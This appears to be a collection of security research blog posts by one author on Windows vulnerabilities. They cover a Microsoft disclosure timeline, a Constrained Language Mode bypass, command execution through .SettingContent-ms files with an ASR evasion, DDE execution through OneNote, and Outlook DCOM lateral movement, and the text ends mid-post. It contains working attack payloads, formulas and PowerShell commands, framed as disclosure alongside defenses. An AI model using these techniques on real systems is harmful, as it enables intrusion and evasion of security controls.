CVE-2018-8414: A Case Study in Responsible Disclosure

The process of vulnerability disclosure can be riddled with frustrations, concerns about ethics, and communication failures. I have had tons of bugs go well, and I have had tons of bugs go poorly.

I submit a lot of bugs, through both bounty programs (Bugcrowd/HackerOne) and direct reporting lines (Microsoft). I’m not here to discuss ethics. I’m not here to provide a solution to the great “vulnerability disclosure” debate. I am simply here to share one experience that really stood out to me, and I hope it causes some reflection on the reporting processes for all vendors going forward.

First, I’d like to give a little background on myself and my relationship with vulnerability research.

I’m not an experienced reverse engineer. I’m not a full-time developer. Do I know C/C++ well? No. I’m relatively new to the industry (3 years in). I give up my free time to do research and close my knowledge gaps. I don’t find crazy kernel memory leaks; rather, I find often-overlooked user-mode logic bugs (DACL overwrite bugs, anyone?).

Most importantly, I do vulnerability research (VR) as a hobby in order to learn technical concepts I’m interested in that don’t necessarily apply directly to my day job. While limited, my experience in VR comes with the same pains that everyone else has.

When I report bugs, the process typically goes like this:

  1. Find bug->Disclose bug->Vendor’s eyes open widely at bug->Bug is fixed and CVE possibly issued (with relevant acknowledgement)->case closed
  2. Find bug->Disclose bug->Vendor fails to see the impact, issues a won’t fix->case closed

When looking at these two situations, there are various factors that can determine if your report lands on #1 or #2. Such factors can include:

  1. Internal vendor politics/reorg
  2. Case handler experience/work ethic/communication (!!!!)
  3. Report quality (did you explain the bug well, and outline the impact the bug has on a product?)

Factors that you can’t control can start to cause frustration when they occur repeatedly. This is where the vendor needs to be open to feedback regarding their processes, and where researchers need to be open to feedback regarding their reports.

So, let us look at a case study in a vulnerability report gone wrong (and then subsequently rectified):

On Feb 16, 2018 at 2:37 PM, I sent an email to secure@microsoft.com with a write-up and PoC for RCE in the .SettingContent-ms file format on Windows 10. Here is the original email:

This situation is a good example where researchers need to be open to feedback. Looking back on my original submission, I framed the bug mostly around Office 2016’s OLE block list and a bypass of the Attack Surface Reduction Rules in Windows Defender. I did, however, mention in the email that “The PoC zip contains the weaponized .settingcontent-ms file (which enables code-execution from the internet with no security warnings for the user)”. This is a very important line, but it was overshadowed by the rest of the email.

On Feb 16, 2018 at 4:34 PM, I received a canned response from Microsoft stating that a case number was assigned. My understanding is that this email is fairly automated when a case handler takes (or is assigned) your case:

Great. At this point, it is simply a waiting game while they triage the report. After a little bit of waiting, I received an email on March 2nd, 2018 at 12:27pm stating that they successfully reproduced the issue:

Awesome! This means that they were able to take my write-up with PoC and confirm its validity. At this very point, a lot of researchers experience frustration. You take the time to find a bug, you take the time to report it, you get almost immediate responses from the vendor, and once they reproduce it, things go quiet. This is understandable, since they are likely working on root cause analysis of the issue. This is the critical point at which it will be determined if the bug is worth fixing or not.

I will admit, I generally adhere to the 90-day policy that Google Project Zero uses. I do not work for GPZ, and I don’t get paid to find bugs (or manage multiple reports), so I tend to be lenient if the communication is there. If a vendor doesn’t communicate with me, I drop a blog post the day after the 90-day window closes.

Vendors, PLEASE COMMUNICATE TO YOUR RESEARCHERS!

In this case, I did as many researchers would do once more than a month goes by without any word…I asked for an update:

At this point, it has almost been a month and a half since I have heard anything. After asking for an update, this email comes in:

Interesting…all of a sudden I have someone else handling my case? I can understand this, as Microsoft is a huge organization with various people handling the massive load of reports they get each day. Maybe my case handler got swamped?

Let’s pause and evaluate things thus far: I reported a bug. This bug was assigned a case number. I was told they reproduced the issue, then I hear nothing for a month and a half. After reaching out, I find out the case was re-assigned. Why?

Vendors, this is what causes frustration. Researchers feel like they are being dragged along and kept in the dark. Communication is key if you don’t want 0days to end up on Twitter. In reality, a lot of us sacrifice personal time to find bugs in your products. If people feel like they don’t matter or are placed on the backburner, they are less likely to report bugs to you and more likely to sell them or drop them online.

Ok, so my case was re-assigned on April 25th, 2018 at 12:42 pm. I say “Thanks!!” a few days later and let the case sit while they work the bug.

Then, a little over a month goes by with no word. At this point, it has been over 90 days since I submitted the original report. In response, I sent another follow up on June 1st, 2018 at 1:29pm:

After a few days, I get a response on June 4th, 2018 at 10:29am:

Okay. So, let’s take this from the top. On Feb 16, 2018, I reported a bug. After the typical process of opening a case and verifying the issue, I randomly get re-assigned a case handler after not hearing back for a while. Then, after waiting some time, I still don’t hear anything. So, I follow up and get a “won’t fix” response a full 111 days after the initial report.

I’ll be the first to admit that I don’t mind blogging about something once a case is closed. After all, if the vendor doesn’t care to fix it, then the world should know about it, in my opinion.

Given that response, I went ahead and blogged about it on June 11, 2018. After I dropped the post, I was contacted pretty quickly by another researcher on Twitter letting me know that my blog post resulted in 0days in Chrome and Firefox due to Mark-of-the-Web (MOTW) implications on the .SettingContent-ms file format. Given this new information, I sent a fresh email to MSRC on June 14, 2018 at 9:44am:

At this point, I saw two exploits impacting Google Chrome and Mozilla Firefox that utilized the .SettingContent-ms file format. After resending details, I got an email on June 14, 2018 at 11:05am, in which MSRC informed me the case would be updated:

On June 26, 2018 at 12:17pm, I sent another email to MSRC letting them know that Mozilla issued CVE-2018-12368 due to the bug:

That same day, MSRC informed me that the additional details would be passed along to the team:

This is where things really took a turn. I received another email on July 3, 2018 at 9:52pm stating that my case had been reassigned once again, and that they are re-evaluating the case based on various other MSRC cases, the Firefox CVE, and the pending fixes to Google Chrome:

This is where sympathy can come into play. We are all just people doing jobs. While the process I went through sucked, I’m not bitter or angry about it. So, my response went like this:

After some time, I became aware that some crimeware groups were utilizing the technique in some really bad ways (https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat). After seeing it being used in the wild, I let MSRC know:

MSRC quickly let me know that they are going to ship a fix as quickly as possible…which is a complete 180 compared to the original report assessment:

Additionally, there was mention of “another email on a different MSRC case thread”. That definitely piqued my interest. A few days later, I got a strange email with a different case number than the one originally assigned:

At this point, my jaw was on the floor. After sending some additional information to a closed MSRC case, the bug went from a “won’t fix” to “we are going to ship a fix as quickly as possible, and award you a bounty, too”. After some minor logistical exchanges with the Microsoft Bounty team, I saw that CVE-2018-8414 landed a spot on cve.mitre.org. This was incredibly interesting given that less than a month prior, the issue was sitting as a “won’t fix”. So, I asked MSRC about it:

This is when I quickly found out that CVE-2018-8414 was being issued for the .SettingContent-ms RCE bug:

This is where the process gets cool. Previously, I disclosed a bug. That bug was given a “won’t fix” status. So, I blogged about it (https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39). I then found out it had been used to exploit two browsers, and it was being used in the wild. Instead of letting things sit, I was proactive with MSRC and let them know about all of this. Once the August Patch Tuesday came around, I received this email:

Yay!!! So Microsoft took a “Won’t Fix” bug and reassessed it based on new information I had provided once the technique was public. After a few more days and some logistical emails with Microsoft, I received this:

I have to give it to Microsoft for making things right. This bug report went from “won’t fix” to a CVE, public acknowledgement and a $15,000 bounty pretty quickly.

As someone who likes to critique myself, I can’t help but acknowledge that the original report was mostly focused on Office 2016 OLE and Windows Defender ASR, neither of which are serviceable bugs (though, RCE was mentioned). How could I have done better, and what did I learn?

If you have a bug, demonstrate the most damage it can do. I can’t place all the fault on myself, though. While I may have communicated the *context* of the bug incorrectly, MSRC’s triage and product teams should have caught the implications in the original report, especially since I mentioned “which enables code-execution from the internet with no security warnings for the user”.

This brings me to my next point. We are all human beings. I made a mistake in not clearly communicating the impact/context of my bug. MSRC made a mistake in the assessment of the bug. It happens.

Here are some key points I learned during this process:

  1. Vendors are people. Try to do right by them, and hopefully they try to do right by you. MSRC gave me a CVE, an acknowledgement and a $15,000 bounty for a bug which ended up being actively exploited before being fixed.
  2. Vendors: PLEASE COMMUNICATE TO YOUR RESEARCHERS. This is the largest issue I have with vulnerability disclosure. This doesn’t just apply to Microsoft, this applies to every vendor. If you leave a researcher in the dark, without any sort of proactive response (or an actual response), your bugs will end up in the last place you want them.
  3. If you think your bug was misdiagnosed, see it through by following up and stating your case. Can any additional information be provided that might be useful? If you get a bug that is issued a “won’t fix”, and then you see it being exploited left and right, let the vendor know. This information could change the game for both you and their customers.

Vulnerability disclosure is, and will continue to be, a hard problem. Why? Because there are vendors out there that will not do right by their researchers. I am sitting on 0days in products due to a hostile relationship with “VendorX” (not Microsoft, to be clear). I also send literally anything I think might remotely resemble a bug to other vendors, because they do right by me.

At the end of the day, treat people the way you would like to be treated. This applies to both vendors and researchers. We are all in this to make things better. Stop adding roadblocks.

Timeline:

Feb 16, 2018 at 2:37 PM EST: Report submitted to secure@microsoft.com
Feb 16, 2018 at 4:34 PM EST: MSRC acknowledged the report and opened a case
March 2, 2018 at 12:27 PM EST: MSRC responded noting they could reproduce the issue
April 24, 2018 at 4:06 PM EDT: Requested an update on the case
April 25, 2018 at 12:42 PM EDT: Case was reassigned to another case handler
June 1, 2018 at 1:29 PM EDT: Asked the new case handler for a case update
June 4, 2018 at 10:29 AM EDT: Informed the issue was below the bar for servicing; case closed
June 11, 2018: Issue is publicly disclosed via a blog post
June 14, 2018 at 9:44 AM EDT: Sent MSRC a follow-up after learning of two browser bugs abusing the issue
June 14, 2018 at 11:05 AM EDT: Case was updated with new information
June 26, 2018 at 12:17 PM EDT: Informed MSRC of the Mozilla CVE (CVE-2018-12368)
June 26, 2018 at 1:15 PM EDT: MSRC passed the mozilla CVE to the product team
July 3, 2018 at 9:52 PM EDT: Case was reassigned to another case handler
July 23, 2018 at 4:49 PM EDT: Let MSRC know .SettingContent-ms was being abused in the wild
July 27, 2018 at 7:47 PM EDT: MSRC informed me they are shipping a fix ASAP
July 27, 2018 at 7:55 PM EDT: MSRC informed me of bounty qualification
Aug 6, 2018 at 3:39 PM EDT: Asked MSRC if CVE-2018-8414 was related to the case
Aug 6, 2018 at 4:23 PM EDT: MSRC confirmed CVE-2018-8414 was assigned to the case
Aug 14, 2018: Patch pushed out to the public
Sept 28, 2018 at 4:36 PM EDT: $15,000 bounty awarded

Before publishing this blog post, I asked MSRC to review it and offer any comments they may have. They asked that I include an official response statement from them, which you can find below:

Cheers,
Matt N.

CVE-2018-8212: Device Guard/CLM bypass using MSFT_ScriptResource

Device Guard and the enlightened scripting environments that come with it are a lethal combination for disrupting attacker activity. Device Guard will prevent unapproved code from executing while placing scripting languages such as PowerShell and the Windows Scripting Host in a locked down state. In order to operate in such an environment, researching bypasses can be immensely useful. Additionally, there are evasion advantages that can come with executing unsigned code via signed/approved scripts or programs.

When hunting for Constrained Language Mode (CLM) bypasses in the context of Device Guard, investigating Microsoft-signed PowerShell modules for calls that allow arbitrary, unsigned code to be executed is always a fruitful endeavor as most Microsoft PowerShell modules will be signed (i.e. implicitly approved per policy). To combat abusing signed PowerShell modules to circumvent CLM, Microsoft added a check to make sure a module can only execute exported functions if the module is loaded in CLM (CVE-2017-8715). This means that, while a script may be signed and allowed per policy, that script can only execute functions that are explicitly exported via Export-ModuleMember. This addition significantly reduces the attack surface for signed PowerShell modules as non-exported functions will be subject to CLM, the same as unsigned code.

While this addition reduces the attack surface, it doesn’t remove it entirely. While analyzing Microsoft-signed PowerShell module files for functions that allowed unsigned code-execution, “MSFT_ScriptResource.psm1” from the Desired State Configuration (DSC) module cropped up. This module is signed by Microsoft, and has a function called “Get-TargetResource” that takes a “GetScript” parameter:
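An abridged sketch of the relevant logic (reconstructed from the description below, not the verbatim module source):

function Get-TargetResource
{
    [CmdletBinding()]
    param
    (
        [parameter(Mandatory = $true)]
        [ValidateNotNullOrEmpty()]
        [string] $GetScript
    )

    # The attacker-controlled string becomes a scriptblock...
    $script = [ScriptBlock]::Create($GetScript)

    # ...which rides along in $PSBoundParameters to ScriptExecutionHelper
    $null = $PSBoundParameters.Remove("GetScript")
    $PSBoundParameters.Add("ScriptBlock", $script)
    ScriptExecutionHelper @PSBoundParameters
}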

Looking at this function, the code passed via -GetScript is added to a new scriptblock via [ScriptBlock]::Create(). After doing so, it passes $PSBoundParameters (which now carries the newly created scriptblock) to the function “ScriptExecutionHelper”.

If we take a look at “ScriptExecutionHelper”, all it does is take $PSBoundParameters (which includes our newly created scriptblock) and execute it via the call operator (&):
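Again as an abridged sketch:

function ScriptExecutionHelper
{
    param ([ScriptBlock] $ScriptBlock)

    # Whatever scriptblock arrives is executed via the call operator
    & $ScriptBlock
}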

Since all of this is happening within a Microsoft signed module, the module is permitted to run in FullLanguage mode (i.e. without any restrictions imposed upon it). To abuse this, all we need to do is pass our malicious PowerShell code to Get-TargetResource via the -GetScript parameter. But, isn’t the Export-ModuleMember mitigation from CVE-2017-8715 supposed to prevent function abuse? Looking at the exported functions in “MSFT_ScriptResource.psm1”, the abusable function “Get-TargetResource” is actually exported for us:
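The export list looks something along these lines (abridged; DSC resource modules conventionally export their Get/Set/Test functions):

Export-ModuleMember -Function Get-TargetResource, Set-TargetResource, Test-TargetResource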

Excellent! To test this out, we can add some arbitrary C# code (that simply takes the Square Root of 4) to a PowerShell variable called $code:
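A sketch of that setup (the class and method names are arbitrary):

$code = @"
using System;

public class Test
{
    // Mirrors the demo described above: simply takes the square root of 4
    public static double Bypass()
    {
        return Math.Sqrt(4);
    }
}
"@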

After doing so, we just need to import the “MSFT_ScriptResource” PowerShell module and call “Get-TargetResource” with “Add-Type -TypeDefinition $code” as the -GetScript parameter. When this executes, the Microsoft signed PowerShell module will be loaded in FullLanguage mode (since it is signed and permitted via the Device Guard policy), and the code passed to the Get-TargetResource function will thus be executed in FullLanguage mode as well:
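A sketch of the chain (the module path is an assumption and may vary by build, and the function may require additional mandatory parameters depending on the module version):

Import-Module "$env:windir\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DscResources\MSFT_ScriptResource\MSFT_ScriptResource.psm1"

# $code expands into the -GetScript string, so Add-Type compiles our C# inside
# the signed module's FullLanguage scope
Get-TargetResource -GetScript "Add-Type -TypeDefinition $code"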

As you can see above, we are running in ConstrainedLanguage mode and getting the square root of 4 fails as those method calls are blocked. We then add our “malicious” code to the $code variable. All this code does is take the SquareRoot of 4, like we previously tried to do. Once that is done, the “MSFT_ScriptResource” module is imported and our “malicious” code is passed to “Get-TargetResource” via the -GetScript parameter. When that executes, the Add-Type call is executed and our “malicious” code is executed, thus circumventing CLM on Device Guard. It should be noted that enabling ScriptBlock logging will still capture the CLM bypass attempt.

This bug was fixed via CVE-2018-8212. If you are interested, Microsoft recently added bypasses like this to the WDAC Application Security bounty program: https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria

 

Cheers,

Matt N.

The Tale of SettingContent-ms Files

As an attacker, initial access can prove to be quite the challenge against a hardened target. When selecting a payload for initial access, an attacker has to select a file format that allows arbitrary code execution or shell command execution with minimal user interaction. These file formats can be sparse, which is why attackers have relied on file types like .HTAs, Office macros, .VBS, .JS, etc. There are obviously a finite number of built-in file extensions on Windows, and as defenses improve, the number of effective payloads continues to shrink.

Additionally, an attacker has to get that file to the end user in a way that will result in execution. Again, options for this can be limited, as directly linking to payloads or attaching them to emails tends to get blocked by antivirus or browser protections. This is why attackers have resorted to Object Linking and Embedding (OLE), ZIP files, etc. To combat the file delivery vector, Office 2016 introduced default blocking of all “dangerous” file formats embedded via OLE. This reduces the effectiveness of one of the most relied upon payload delivery methods. When trying to activate a blocked file extension, Office will throw an error and prevent execution:

In addition to OLE blocking, Microsoft also introduced Attack Surface Reduction (ASR) rules into Windows 10 (which require Windows Defender AV as a dependency). The purpose of these rules is to reduce the functionality that an attacker can abuse or exploit to obtain code-execution on the system. One of the most touted and effective ASR rules is “Block Office applications from creating child processes”. This rule will block any attempt to spawn a process as a child of an Office application:

When you combine OLE blocking and ASR together, the options to execute code on an endpoint from the internet become a little more limited. Most useful file types can’t be delivered via OLE per the new block in Office 2016, and ASR’s child process creation rule prevents any instances of a child process spawning under an Office application.

How could we circumvent these controls? I first decided to tackle the file format problem. I spent a lot of hours going through the registry looking for new file formats that might allow execution. Most of these formats can be found in the root of the HKCR:\ registry hive. The process involved pulling all of the registered file formats out and then looking at them to see if the format itself allowed for anything interesting.

After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. An example .SettingContent-ms file will look like this:
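The following is a reconstruction from the description (values abbreviated; minor schema details may differ from the original PoC):

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\control.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingInformation>
      <SettingIdentity>SystemSettings</SettingIdentity>
    </SettingInformation>
  </SearchableContent>
</PCSettings>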

All this file does is open the Control Panel for the user. The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” with something like “cmd.exe /c calc.exe”?
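In other words, swapping the element to:

<DeepLink>C:\Windows\System32\cmd.exe /c calc.exe</DeepLink>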

Then if we double-click the file:

What is interesting is that when double-clicking the file, there is no “open” prompt. Windows goes straight to executing the command.

Great! So we have a file format that allows shell command execution via a file open. This solves the “what file format to use” problem of initial access. Now, how can we deliver it? My next thought was to see what happens if this file comes straight from the internet via a link.

Yikes!! When this file comes straight from the internet, it executes as soon as the user clicks “open”. Looking at the streams of the file, you will notice that it does indeed grab Mark-Of-The-Web:
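A sketch of checking the alternate data stream (the file name is hypothetical; the ZoneId value is the one discussed below):

PS> Get-Content .\PoC.SettingContent-ms -Stream Zone.Identifier
[ZoneTransfer]
ZoneId=3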

When looking up the ZoneIds online, “3” equals “URLZONE_INTERNET”. For one reason or another, the file still executes without any notification or warning to the user.

So, we now have a file type that allows arbitrary shell command execution and displays zero warnings or dialogues to the user. When trying to get initial access, going across a target’s perimeter with an unusual file type can be risky. Ideally, this file would be placed in a container of a more common file type, such as an Office document.

As mentioned before, Office 2016 blocks a preset list of “known bad” file types when embedded with Object Linking and Embedding. The SettingContent-ms file format, however, is not included in that list:

At this point, we can evade the Office 2016 OLE file extension block by embedding a malicious .SettingContent-ms file via OLE:

When a document comes from the internet with a .SettingContent-ms file embedded in it, the only thing the user sees is the “Open Package Contents” prompt. Clicking “Open” will result in execution. If an environment doesn’t have any Attack Surface Reduction rules enabled, this is all an attacker needs to execute code on the endpoint. I was curious, so I poked at how this holds up with ASR’s child process creation rule enabled. It is also worth noting that, as of the time of this post, ASR rules do not appear to work on Office if Office was installed from the Windows Store.

Enabling these rules is pretty simple, and can be done with one PowerShell command: “Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Enabled”

The <rule ID> parameter is the GUID of the rule you want to enable. You can find the GUID for each ASR rule documented here. For this test, I want to enable the Child Process Creation rule, which is GUID D4F940AB-401B-4EFC-AADC-AD5F3C50688A.
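Putting the pieces together:

Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled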

After enabling the rule, the attack no longer works:

Since the rule is designed to block child processes from being spawned from an Office application, our payload executed, but the rule blocked the command. This got me thinking about how ASR achieves that without breaking some functionality. I first started to just test random binaries in random paths to see if ASR was blocking based on the image path. This was quite time consuming and didn’t get me very far.

I ended up taking a step back and thinking about what parts of Office have to work. After running ProcMon and looking at Process Explorer for a little bit while clicking around in Word, I noticed that there were still child processes being spawned by Word.

This makes sense, as Office needs to use features that rely on other programs. I thought that maybe the ASR rule blocks child processes based on image path, but images in the Office path are allowed to be spawned when features are activated.

To test this theory, I changed my .SettingContent-ms file to the path of “Excel.exe”:
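For example (the Office install path here is an assumption; it varies by version and install type):

<DeepLink>C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE</DeepLink>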

The next step is to embed this new file into a Word document and see if ASR blocks “Excel.exe” from being spawned.

Interestingly enough, ASR allows Excel to start. So the child process creation ASR rule appears to be making decisions based on whitelisted paths.

This sent me down a long, long path of trying to find a binary I could use that existed in the path “C:\Program Files\Microsoft Office”. After going through a few of them and passing “C:\Windows\System32\cmd.exe” to them as a parameter on the command line, one of them kicked:

Perfect! We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule. To test this full chain, I updated my .SettingContent-ms file to look like this:
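Something along these lines (the AppVLP.exe path is an assumption that varies by install):

<DeepLink>"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" C:\Windows\System32\cmd.exe /c calc.exe</DeepLink>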

Now, the file just needs to be embedded into an Office document and executed:

As you can see, with Office 2016’s OLE block rule and ASR’s Child Process Creation rule enabled, .SettingContent-ms files combined with “AppVLP.exe” in the Office folder allow us to circumvent these controls and execute arbitrary commands.

While Office documents are often marked with MOTW and are opened in the Protected View Sandbox, there are file formats that allow OLE and aren’t triggered by the Protected View sandbox. You can find more on that here.

Wrap Up:

After looking into ASR and the new file formats in Windows 10, I realized that it is important to try and audit new binaries and file types that get added in each release of Windows. In this case, the .SettingContent-ms extension can allow an attacker to run arbitrary commands on the latest version of Windows while evading ASR and Office 2016 OLE blocks. Additionally, the file type appears to give execution (even from the internet) immediately after it’s opened, despite having the MOTW applied.

Defenses:

Great, so what can you do about it? Ultimately, a .SettingContent-ms file should not be executing anywhere outside of the “C:\Windows\ImmersiveControlPanel” path. Additionally, since the file format only allows for executing shell commands, anything being run through that file is subject to command line logging.

It is also a good idea to always monitor child process creations from Office applications. There are a few applications that should be spawning under the Office applications, so monitoring for outliers can be useful. One tool that can accomplish this is Sysmon.

Another option is to neuter the file format by killing its handler. I have NOT tested this extensively and can offer no guarantee that something within Windows won’t break by doing this. For those who want to play around with the implications of killing the handler to the .SettingContent-ms file format, you can set the “DelegateExecute” value in “HKCR:\SettingContent\Shell\Open\Command” to be empty. Again, this might break functionality on the OS, so proceed with caution.
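A sketch of that change (untested, per the caveat above; HKCR is reached via the Registry:: provider path):

Set-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\SettingContent\Shell\Open\Command" -Name "DelegateExecute" -Value ""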

You can find a PoC SettingContent-ms file here: https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8

Reporting timeline:

2/16/2018: Report sent to MSRC

2/16/2018: MSRC acknowledged the report, case number assigned

3/2/2018: MSRC confirmed that they could reproduce the issue

4/24/2018: Requested status update

4/25/2018: MSRC informed me of a case handler change. An update was requested from the engineering team and would be relayed to me ASAP

6/1/2018: Requested another update from MSRC

6/4/2018: MSRC responded with a note that the severity of the issue is below the bar for servicing and that the case will be closed.

06/11/2018: Report published

 

Cheers!
Matt N.

Reviving DDE: Using OneNote and Excel for Code Execution

TL;DR: You can achieve DDE execution with Excel SpreadSheets embedded within OneNote. This bypasses the original Excel mitigation ruleset (Microsoft has released a patch to properly mitigate this) as well as the Protected View sandbox 🙂

Dynamic Data Exchange (DDE) has been a hot topic as of late. For those unfamiliar with DDE, it is designed to transfer data between two applications. In 2014, Contextis put out a nice blog post on using DDE in Microsoft Excel for code execution by utilizing the “=DDE()” formula.

Then, on October 9th 2017, SensePost released a really great blog post on abusing the DDEAUTO field code in Microsoft Word to get code execution. Shortly after, various malware families adopted the technique and it was quickly seen in the wild.

After seeing a spike in malicious use, Will Dormann (@wdormann) of US-CERT published some registry changes that would widely mitigate most DDE threats. These changes disabled DDE and prevented links from updating automatically in Word and Excel. Will added a OneNote block after I privately shared the details outlined below with him. Unfortunately, the only fix was to completely kill embedded files, which is less than ideal. You can find these registry changes here: https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b

This guidance was really helpful to those dealing with actors using DDE techniques more and more. Then, on November 8th 2017, Microsoft published an official post that outlines mitigating the DDE threat for those who don’t use the protocol in their environment, which was released under Advisory ADV170021 with additional documentation here. These mitigations were largely just for Word, and they involved preventing DDE execution entirely as opposed to just stopping automatic link updating. In addition to this post, Microsoft also stated that Protected View will prevent automatic DDE execution and that users should open untrusted documents with caution.

After seeing these new DDE mitigation recommendations, I became curious how these were handled when executed from within a different Office application, such as Publisher or OneNote. At the time, Will Dormann’s gist was the only source for mitigation options in other Office apps (such as Excel) as Microsoft only released official guidance for Word.

So, why OneNote? Well, it allows a user to embed Excel spreadsheets into a note document and then save it. This provides the end user the ability to reference or use Excel features directly within OneNote. As you may know, you can abuse DDE in Excel to get code execution! Ideally, Will’s Excel registry changes to stop DDE attacks would apply to any Excel sheets embedded in OneNote. Unfortunately, this wasn’t the case.

When implementing Will’s Excel registry change (specifically “DDEAllowed” set to DWORD 0), you will see something like this when opening a spreadsheet that contains a DDE formula:

So, the Excel DDE block is working as expected. Now, let’s look at OneNote. In order to utilize the Excel functionality in OneNote, you can go to “SpreadSheet” under the “Files” tab and either import an existing Excel Spreadsheet or create a new one.

So, OneNote allows us to import an existing spreadsheet. What happens if we import a DDE-laced spreadsheet? First, we need to create it. Ryan Hanson (@ryhanson) put out a tweet showing that you can manipulate the warning box during DDE execution and change the binary name. This can be helpful as you can change it to something like “MSEXCEL.exe” instead of displaying “cmd.exe” or “powershell.exe”.

           Source: https://twitter.com/ryHanson/status/918598525792935936
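The exact formula isn’t reproduced here; a reconstruction in the spirit of that tweet looks something like the following, where the text before the pipe is what the warning dialog displays and the relative path walks from the Office directory to cmd.exe:

=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!A1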

 

After adding that formula to an Excel spreadsheet and saving it, we can now test it to ensure it displays properly. To do so, I have removed the Excel DDE mitigation registry changes.

Great, so it works. Next, let’s test it with Will’s Excel registry changes applied:

Awesome, so these changes do indeed block the Excel DDE PoC that we have just created. Now that we have our DDE spreadsheet ready and tested, we can import it into OneNote by going to “Insert->SpreadSheet->Existing Excel SpreadSheet”.

OneNote will ask you to browse to the file you want to import, which will be the previously created DDE-laced spreadsheet. Next, it will ask you if you want to attach the file or insert the spreadsheet. We will do “Insert SpreadSheet”.

OneNote will then import the spreadsheet and, during that process, it will attempt to execute your DDE command. To prevent that, simply click “No”.

Finally, save the OneNote file. At this point, that OneNote file has a DDE laced Excel SpreadSheet directly embedded in it. Now, let’s see what happens when the Excel SpreadSheet is accessed from within the OneNote file with the Excel DDE mitigation registry changes in place:

Clicking “Yes” results in the command being executed:

So, despite blocking DDE in Excel via “DDEAllowed”, the functionality is still there when accessed through OneNote. After chatting with Will Dormann, the only working mitigation is to set “DisableEmbeddedFiles” to 1. This obviously kills all file embedding functionality as a side-effect, which isn’t great for usability.

As mentioned above, one of Microsoft’s statements notes that Protected View will prevent the DDE vectors when originating from an untrusted source (such as the internet). This is the case for most Office applications as any content originating from an untrusted source is opened in a sandbox first. OneNote, however, is not enrolled in Protected View and will not trigger it when pulled from the internet. If a user has OneNote installed, an attacker can embed a weaponized Excel spreadsheet into a OneNote file and send it to a victim via a weblink or an email attachment. When the user receives the OneNote file and opens the embedded spreadsheet, it will not open in Protected View and they will simply be presented with the DDE prompt (which you can tamper with as demonstrated above):

*It should be noted that the Protected View aspect was reported to MSRC on April 20th, 2017 and it was deemed not a security issue.

So, what can you do? Well, at the time, the only mitigation was to completely kill embedding in OneNote. This was reported to Microsoft on October 10th, 2017, and on January 9th, 2018 they pushed out an update to all Office versions going back to 2007. The Excel update was added to the already existing Advisory ADV170021, which now details how to implement mitigations for both Excel and Word (previously, only Word guidance was available). Additional documentation can be found here. This update created a value you can add under Microsoft Excel’s security options in the registry. By setting “DisableDDEServerLaunch” to DWORD 1, DDE will effectively be neutered for Excel. This is important because OneNote itself wasn’t entirely interesting; it was the embedded Excel functionality that made this attack work. By adding mitigation options for Excel, users can protect themselves from this attack.
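As a sketch, applying the new Excel value via PowerShell (the 16.0 version segment is an assumption; adjust for the installed Office version):

New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "DisableDDEServerLaunch" -PropertyType DWORD -Value 1 -Force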

Additionally, you can employ Attack Surface Reduction (ASR) rules in Windows 10 1709 to prevent not only DDE attacks, but other attacks where an Office program is spawning a child process. You can read more on ASR here.

-Matt N.

Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript

In the past, I have blogged about various methods of lateral movement via the Distributed Component Object Model (DCOM) in Windows. This typically involves identifying a DCOM application that has an exposed method allowing for arbitrary code execution. In this example, I’m going to cover Outlook’s CreateObject() method.

If you aren’t familiar with CreateObject(), it essentially allows you to instantiate an arbitrary COM object. The issue with abusing DCOM applications for lateral movement is that you are normally at the mercy of the method being used. The majority of the talked about techniques involve abusing a ShellExecute (or similar) method to start an arbitrary process or opening a malicious file on the target host, which requires placing a payload on disk (or a network share). While these techniques work great, they aren’t ideal from a safety perspective.

For example, the ShellBrowser/ShellBrowserWindow applications only allow you to start a process with parameters, which makes the technique susceptible to command line logging. What about the Run() methods for macro execution? Well, that requires the document with the malicious macro to be local or hosted on a share (not exactly ideal).

What if we could get direct shellcode execution via DCOM and not have to worry about files on the target or arbitrary processes such as powershell or regsvr32? Luckily, Outlook is exposed via DCOM and has us covered.

First, we need to instantiate Outlook remotely:
$com = [Type]::GetTypeFromProgID('Outlook.Application', '192.168.99.152')
$object = [System.Activator]::CreateInstance($com)

After doing so, you will have the CreateObject() method available to you:

 

As discussed above, this method provides the ability to instantiate any COM object on the remote host. How might this be abused for shellcode execution? Using the CreateObject method, we can instantiate the ScriptControl COM object, which allows you to execute arbitrary VBScript or JScript via the AddCode() method:

$RemoteScriptControl = $object.CreateObject("ScriptControl")

If we use James Forshaw’s DotNetToJScript technique to deserialize a .NET assembly in VBScript/JScript, we can achieve shellcode execution via the ScriptControl object by passing the VBScript/JScript code to the AddCode() method. Since the ScriptControl object was instantiated remotely via Outlook’s CreateObject() method, any code passed will be executed on the remote host. To demonstrate this, I will use a simple assembly that starts calc. The PoC C# looks something like this:
